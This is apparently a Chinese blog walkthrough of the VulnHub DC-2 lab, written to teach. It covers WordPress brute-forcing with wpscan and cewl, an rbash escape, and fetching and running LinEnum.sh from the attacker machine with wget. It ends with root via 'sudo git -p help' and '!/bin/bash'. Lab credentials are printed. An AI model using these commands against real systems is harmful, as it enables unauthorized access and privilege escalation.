VulnHub 靶机学习No.2 DC-2

最新推荐文章于 2024-06-03 17:08:34 发布
最新推荐文章于 2024-06-03 17:08:34 发布
阅读量231 收藏
点赞数
分类专栏: web安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gh0stf1re/article/details/108847599
版权

本篇博客的主要内容

VulnHub 靶机学习No.2 DC-2

靶机运行说明

  • 靶机难度:初级
  • 攻击机:kali linux,ip地址:192.168.56.102
  • 靶机:DC-2,IP地址:192.168.56.104
  • 目标:找到5个flag

环境配置

我个人是在vmware中安装的kali,在virtualbox中运行vulnhub系列的靶机
靶机的网络设置:
在这里插入图片描述
vmware的网络设置:
在这里插入图片描述
kali的网络设置:
在这里插入图片描述
具体可以参照这一篇:https://blog.csdn.net/weixin_44214107/article/details/103267896

dc-2特有配置:
需要将dc-2的ip 域名写入到kali的hosts文件中
在这里插入图片描述

信息收集

仅开启靶机和kali,使用nmap扫描kali所在的C段

nmap 192.168.56.102/24

扫描结果:
在这里插入图片描述
确认靶机的ip为192.168.56.104,对其进行全端口扫描

nmap -sV -p 1-65535 192.168.56.104

发现其开放web服务和ssh服务
在这里插入图片描述
访问网页,首先可以知道这是一个wordpress框架的站点(手上的wpscan已经跃跃欲试),然后轻松找到了第flag1
在这里插入图片描述

你常规的字典可能不会起作用,作为替代,或许你仅需要cewl
更多的密码总是更好的,但是有时候你或许不能用他们每次都爆破成功
登录一个账号查看下一个flag
如果找不到,就登录其他账号

???完全不造cewl是个什么鬼???内啥,先百度一哈。原来是一款密码生成工具(kali自带)
在这里插入图片描述
具体使用说明,可以参考搜索的第一条结果:
https://www.freebuf.com/articles/network/190128.html

wpscan 来枚举一波漏洞插件、漏洞主题、用户名

wpscan --url http://dc-2 -e vp -e vt -e u

没发现啥有严重漏洞的插件、主题,用户倒是跑出来了三个
在这里插入图片描述
生成一个user.txt,写入这三个用户名。
在这里插入图片描述

关于爆破字典的选择,由于flag1 已经在提示我们(兄dei,别尝试使用rockyou.txt啦,没用的),我就不浪费时间用“错误字典”爆破了,直接用cewl来生成字典吧。

cewl http://dc-2 -w dict.txt

利用wpscan来进行爆破:

wpscan --url http://dc-2 -U user.txt -P dict.txt

在这里插入图片描述
成功爆破tom和jerry的密码
wordpress的默认登录路径 /wp-admin
使用jerry/adipiscing 成功登录后,发现flag2
在这里插入图片描述

如果你无法通过wordpress来走捷径(也就是说反弹shell),有另一条路可以走。
希望你能够找到另一个入口

用tom/parturient 登录wordpress看看,登录成功,但是连flag2的页面都没有。
题外话:这里爆破成功的两个账号都是很普通的账号,因为登录进去后,看不到插件、主题等选项。如果能够爆破admin账号,那就和EVM靶机一样,可以直接利用msf中的wp_admin_shell_upload 来反弹shell了。

端口扫描时,发现7744端口开着ssh服务,用这两个账号来登录一波
jerry 登录失败
tom 登录成功

ssh -p 7744 tom@192.168.56.104

在这里插入图片描述
flag3就在眼前,却无法使用cat命令,如图中所示,这是一个有限制的shell (rbash)。
这时我们可以使用的命令只有less、ls、scp、vi
在网上找到了几篇关于rbash绕过的文章:
https://xz.aliyun.com/t/7642
https://www.freebuf.com/articles/system/188989.html
http://www.oniont.cn/index.php/archives/143.html

BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin

这时候就可以使用cat命令了
在这里插入图片描述

穷困的老汤姆一直追赶着杰瑞,或许他应该su 所有他造成的压力

su? 这是在提示我们把用户从汤姆 su 到杰瑞?
在这里插入图片描述
成功拿到flag4

很高兴看到你成功到这,但是你还没有做完
你依然需要拿到最后的flag(那个唯一的真正有价值的falg)
这儿没有提示了,靠你自己吧
继续 git outta here!!!

提权

嘴上说着没有提示了,然后又故意提到git,这是要让我们利用git来提权啊

如果没有告诉我们git呢?用LinEnum.sh来先探测一波
kali新打开一个终端,利用python开启一个http服务

python -m SimpleHTTPServer 8000

在这里插入图片描述
cd 到 /tmp 目录,下载kali机器上的LinEnum.sh 脚本,加执行权限,运行脚本并输出到biubiu.txt

cd /tmp
wget http://192.168.56.102:8000/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh > biubiu.txt

在这里插入图片描述
查看一下输出结果

vi biubiu.txt

在这里插入图片描述
利用git来提权实锤了!

sudo git -p help

然后在出现的 “:” 处输入 !/bin/bash并回车,成功root
在这里插入图片描述
成功拿到最后的flag
在这里插入图片描述

知识点总结

  • 字典生成工具cewl的使用
  • ssh 非默认22端口登录
  • su [用户] 与 su - [用户] 的区别
  • rbash的绕过
  • python起一个http服务
  • 提权之前,信息收集脚本:LinEnum
  • git 提权方法

参考链接:

https://blog.csdn.net/weixin_44214107/article/details/103267896
https://www.freebuf.com/articles/network/190128.html
https://xz.aliyun.com/t/7642
https://www.freebuf.com/articles/system/188989.html
http://www.oniont.cn/index.php/archives/143.html

gh0stf1re
关注
专栏目录
VulnHub 靶机学习No.1-EVM
gh0stf1re的博客
09-27 310
本篇博客的主要内容VulnHub 靶机学习No.1-EVM靶机运行说明信息收集反弹shell提权知识点总结:参考链接: VulnHub 靶机学习No.1-EVM 靶机运行说明 靶机难度: 目标: 攻击机:kali linux,ip地址:192.168.56.102 靶机:EVM,IP地址:192.168.56.103 信息收集 仅开启kali靶机,使用nmap扫描kali所在的C段 nmap 192.168.56.102/24 扫描结果: root@kali:~# nmap 192.168.56.
VulnHub 靶机学习No.6 Bulldog
gh0stf1re的博客
10-03 322
本篇博客的主要内容VulnHub 靶机学习No.6 Bulldog靶机运行说明信息收集利用 bashshell提权知识点总结参考链接: VulnHub 靶机学习No.6 Bulldog 靶机运行说明 靶机难度:初级至中级 攻击机:kali linux,ip地址:192.168.56.102 靶机DC-4,IP地址:192.168.56.101 目标:找到终极flag 信息收集 BullDog 靶机直接显示了IP地址:192.168.56.101 使用 nmap 对其进行全端口扫描 nmap -s
linux提权辅助工具(四):LinEnum.sh
weixin_30662011的博客
01-10 1851
来自:https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh #!/bin/bash #A script to enumerate local information from a Linux host version="version 0.94" #@rebootuser #help func...
靶机渗透测试(UA: Literally Vulnerable)
@小张小张的博客
11-19 1306
靶机渗透测试(): **Vulnhub靶机 ** 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(Intermediate) 目标:Covfefe is my Debian 9 based B2R VM, originally created as a CTF for SecTalks_BNE. It has three flags… flag进度:3/3 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关)
FIVE86-0,WordPress初次尝试
qq_43147309的博客
03-17 112
信息收集: 开放了80端口,web登陆,发现使用WordPress框架: 上wpscan,收集版本,信息等: 使用wpscan爆破密码: 最后爆破出用户c0rrupt3d_brain的密码为24992499 使用msf的wp_admin_shell_upload获取shell: 拿到shell后,几乎就已经入侵成功了,开启一个交互式shellpython3 。。。。。。,查...
Linux提权大全
yggcwhat
05-14 9537
Linux提权大全
vulnhub靶机实战_DC-2
最新发布
Varin
06-03 796
vulnhub靶机实战_DC-2
VulnHub 靶机学习No.4 DC-3
gh0stf1re的博客
09-30 253
本篇博客的主要内容VulnHub 靶机学习No.4 DC-3靶机运行说明信息收集提权知识点总结参考链接: VulnHub 靶机学习No.4 DC-3 靶机运行说明 靶机难度:初级 攻击机:kali linux,ip地址:192.168.56.102 靶机DC-3,IP地址:192.168.56.106 目标:找到终极flag 信息收集 仅开启kaliDC-3靶机,使用nmap扫描kali所在C段,确认192.168.56.106为靶机的ip 进行全端口扫描,发现其仅开放80端口的http服务 使
VulnHub 靶机学习No.5 DC-4
gh0stf1re的博客
10-03 174
本篇博客的主要内容VulnHub 靶机学习No.5 DC-4靶机运行说明信息收集命令执行尝试弹shell(但失败)峰回路转提权知识点总结参考链接: VulnHub 靶机学习No.5 DC-4 靶机运行说明 靶机难度:初级至中级 攻击机:kali linux,ip地址:192.168.56.102 靶机DC-4,IP地址:192.168.56.109 目标:找到终极flag 信息收集 只开启 kaliDC-4,使用nmap扫描kali所在的C段,得知 DC-4 的ip为192.168.56.109
VulnHub 靶机学习No.3 DC-1
gh0stf1re的博客
09-29 246
本篇博客的主要内容VulnHub 靶机学习No.3 DC-1靶机运行说明信息收集提权知识点总结参考链接: VulnHub 靶机学习No.3 DC-1 靶机运行说明 靶机难度:初级 攻击机:kali linux,ip地址:192.168.56.102 靶机DC-1,IP地址:192.168.56.107 目标:找到5个flag 信息收集 nmap扫描kali所在C段,得到DC-1的ip为192.168.56.107 对192.168.56.107进行全端口扫描 nmap -sV -p 1-65535
Vulnhub靶机实战——DC-2
冠霖L的博客
09-27 4851
靶机DC-2下载地址:https://download.vulnhub.com/dc/DC-2.zip 描述:靶机DC-2与DC-1一样,共有5个flag,但最终需要root权限才可以找到并查看flag 环境:Vmware 15 Pro虚拟机软件 DC-1靶机IP地址:192.168.220.132 Kali的IP地址:192.168.22...
vulnhub靶机-DC2-Writeup
liuhanzhe的专栏
12-08 658
0x01 部署 靶机地址: https://www.vulnhub.com/entry/dc-2,311/ DESCRIPTION Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. As with the original DC-1, it’s designed with begi
Vulnhub靶机:DC-5渗透详细过程
IerkeU的博客
03-08 5999
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-5,314/ DC-5是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,需要具备中级的渗透测试技巧,只有一个可利用的入口点(也没有 SSH),你需要观察一些不寻常的(会随页面动态刷新的)东西,你的最终目标是放在root目录下的flag。 靶场攻略 信息收集 扫描c段发现目标主
vulnhub】【DC系列】DC2 - WordPress 靶机
Nicky_Zheng的博客
01-26 857
1、信息收集 1.1、端口扫描 netdiscover发现靶机ip : 192.168.57.148 nmap -sSV -A -Pn -n -p 1-65535 --version-intensity 9 192.168.57.148 Nmap scan report for 192.168.57.148 Host is up (0.00100s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 80/tcp
CVE-2018-15473(ssh用户名枚举)漏洞复现(避坑)
gh0stf1re的博客
09-17 6555
CVE-2018-15473 漏洞复现 前言 OpenSSH 7.7前存在一个用户名枚举漏洞,通过该漏洞,攻击者可以判断某个用户名是否存在于目标主机中。 复现过程 克隆poc脚本到本地 git clone https://github.com/Rhynorater/CVE-2018-15473-Exploit.git (注意:该脚本使用python3编写) 安装依赖库: pip3 install -r requirements.txt 运行脚本 root@kali:~/Desktop/CVE-2018-
Metasploitable2 漏洞评估(应该没人比我写得更详细更全了)
gh0stf1re的博客
09-17 6412
Metasploitable2 漏洞评估 深感自己基础不扎实,所以打算好好再练一下,就再日一遍Metasploitable2吧 前情提要 靶机(Metasploitable2)ip:192.168.206.216 攻击机(kali)ip:192.168.206.128 端口扫描 root@kali:~/Desktop/tools# nmap -sV -p 1-65535 192.168.206.216 扫描结果如下 PORT STATE SERVICE VERSION 21/tcp
三个代码执行漏洞的复现
gh0stf1re的博客
04-04 5617
CNVD-2021-30167(用友NC BeanShell远程代码执行) CVE-2019-0193(Apache Solr Velocity模板注入RCE) CVE-2020-14882(Weblogic Console远程代码执行漏洞)
Ubuntu用户提权CVE-2021-3493漏洞复现
gh0stf1re的博客
04-27 2837
1.漏洞摘要 Linux内核中overlayfs文件系统中的Ubuntu特定问题,在该问题中,它未正确验证关于用户名称空间的文件系统功能的应用。由于Ubuntu附带了一个允许非特权的overlayfs挂载的补丁,因此本地攻击者可以使用它来获得更高的特权。 CVE-2021-3493 linux内核中的overlayfs实现未就用户名称空间正确验证底层文件系统中文件的文件功能设置。由于无特权的用户名称空间以及Ubuntu内核中附带的允许无特权的覆盖挂载的补丁的组合,攻击者可以使用它来获得提升的特权,内核中的o
ctfhub web技能树
gh0stf1re的博客
08-30 637
ctfhub web技能树 前言 其实很多题之前已经做过了,但是感觉自己没有吃透吧,只是以做题为目的。所以打算重新做一下,加深一下印象,另外,把知识点也整理一下。 Web前置技能 HTTP协议 请求方式 这时我们采用的http方法是get方法,提示我们采用CTFHUB方法 方法1:利用burp更改请求方式 方法2:使用curl(curl是http神器) curl的用法指南——阮一峰 windows下有一个自带curl的终端神器——cmder,完整版还带有git,非常推荐,具体使用及配置可以参考这几篇
Vulnhub靶机渗透环境搭建及JIS-CTF入门实践
在这篇文章中,我们将学习如何搭建Vulnhub靶机渗透环境,并学习JIS-CTF入门知识,以及蚁剑提权示例。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值